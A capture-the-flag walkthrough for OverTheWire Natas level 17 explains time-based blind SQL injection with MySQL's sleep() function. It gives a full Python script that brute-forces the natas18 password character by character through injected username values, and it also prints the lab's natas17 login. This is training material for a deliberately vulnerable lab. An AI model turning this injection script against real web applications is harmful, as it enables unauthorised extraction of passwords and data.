OverTheWire Natas Level 16 -> Level 17 - Walkthrough
 |
| OverTheWire Natas Solutions |
Introduction
In this level, I'll give you a walkthrough to the natas wargame Level 16 -> Level 17. The php code in this level is similar to one of the previous level, so we will create a python script to get the password.
Goal
Login to natas17 and get the password for the next level.
Login details
URL - http://natas17.natas.labs.overthewire.org
Username - natas17
Password - XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd
Theory
The php code is similar to what we saw in natas15 except for the comments. The echo command which was giving information whether the entered user exists or not has been commented this time.
sleep() function in MySQL is used to delay the execution by specified number of seconds. It returns 0 on success and warning or an error if NULL or negative value is given. Syntax - sleep(seconds)
We will use it in the script to delay the execution and use it as an indication that the word is present in the password.
Solution
Open the URL in a browser. Enter the username and password mentioned above.
The below screen appears after successfully logging in that has an option to enter the username and check whether it exists or not.
Click on "View sourcecode" to see the code.
The code is similar to what we saw in natas15 except that the echo command has been commented. So we will not get the information whether the user exists or not.
Since we will not get any output as an indication, we will use time as an indication. We will include the sleep function from MySQL in our query and tell the application that if the letter we provided is present in the password then sleep for 2 seconds whereas if it is not present then do nothing. So if it takes 2 seconds to respond, then we are sure that the letter exists in the password.
Write below code and save it in your system-:
import requests
target = 'http://natas17.natas.labs.overthewire.org'
charset_0 = (
'0123456789' +
'abcdefghijklmnopqrstuvwxyz' +
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
)
webauth = ('natas17','XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd')
charset_1 = ''
for c in charset_0:
username = ('natas18" AND password LIKE
BINARY "%' + c +'%" AND sleep(2) #')
r = requests.get(target,
auth=webauth,
params={"username":
username}
)
if r.elapsed.total_seconds() >= 2:
charset_1 += c
print ('CSET: ' +
charset_1.ljust(len(charset_0), '*'))
password = ""
while len(password) != 32:
for c in charset_1:
t = password + c
username = ('natas18" AND
password LIKE BINARY "' + t +'%" AND sleep(2) #')
r = requests.get(target,
auth=webauth,
params={"username": username}
)
if r.elapsed.total_seconds()
>= 2:
print ('PASS: ' +
t.ljust(32, '*'))
password = t
break
In the above script, the first for loop tests every character whether it is present in the password or not. Once the for loop ends, we will have all the characters that are present in the password. The second loop tests only the set of characters that were gathered by the first loop and finds the password.
Run the script and after few minutes, we will have the password on our screen.
This completes the walkthrough for Level 17 as we have got the password for natas18. Please post your questions and suggestions in the comment section.
Comments
Post a Comment